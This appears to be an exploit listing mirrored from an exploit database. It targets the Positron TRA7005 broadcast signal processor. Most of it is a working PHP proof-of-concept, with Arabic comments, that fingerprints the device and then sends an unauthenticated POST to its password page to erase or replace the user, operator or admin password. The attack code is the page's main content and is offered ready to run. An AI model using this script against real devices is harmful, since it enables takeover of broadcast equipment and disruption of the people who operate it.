Share
## https://sploitus.com/exploit?id=PACKETSTORM:181855
=============================================================================================================================================
| # Title : Positron Broadcast Signal Processor TRA7005 v1.20 5.1.6 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.1 (64 bits) |
| # Vendor : https://www.positron.it/prodotti/apparati-broadcast/stereo-multicoder/tra-7005/ |
=============================================================================================================================================
poc :
[+] Cross-site request forgery causes authentication bypass in Positron DSP (TRA7005)
[+] save as poc.php
[+] Usage : C:\www\test>php 3.php poc.php
[+] payload :
<?php
// التأكد من أن الوسائط صحيحة
if ($argc != 4) {
echo "Usage: php positron.php <ip:port> <user/oper/admin> <erase/new_pwd>\n";
exit(1);
}
$ip = $argv[1];
$ut = $argv[2];
$wa = $argv[3];
// التحقق من نوع المستخدم
$valid_ut = ['user', 'oper', 'admin'];
if (!in_array(strtolower($ut), $valid_ut)) {
echo "Invalid user type! Use 'user', 'oper', or 'admin'.\n";
exit(1);
}
$url = "http://$ip/_Passwd.html";
$did = "http://$ip/_Device.html";
// التحقق من الجهاز ومعرفة ما إذا كان الهدف ضعيفًا
$response = @file_get_contents($did);
if ($response === FALSE) {
echo "Error checking device.\n";
exit(1);
} elseif (strpos($response, 'TRA7K5') !== false) {
echo "Vulnerable processor found!\n";
} else {
echo "Not Vulnerable or not applicable. Exploit exiting.\n";
exit(1);
}
// إعداد رؤوس الطلب
$options = [
'http' => [
'header' => [
'Content-Type: application/x-www-form-urlencoded',
'Accept-Language: mk-MK,en;q=0.6',
'Accept-Encoding: gzip, deflate',
'User-Agent: R-Marina/11.9',
'Accept: */*'
],
'method' => 'POST',
'content' => '',
],
];
$payload = [];
// إذا كان الهدف مسح كلمة المرور
if (strtolower($wa) == 'erase') {
$payload['PSW_' . ucfirst($ut)] = 'NONE';
} else {
// إذا كان الهدف إعداد كلمة مرور جديدة
$payload['PSW_' . ucfirst($ut)] = $wa;
}
$options['http']['content'] = http_build_query($payload);
// تنفيذ الطلب POST
$context = stream_context_create($options);
$result = file_get_contents($url, false, $context);
if ($result === FALSE) {
echo "Failed to send the request.\n";
} else {
echo "Response:\n";
echo $result;
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================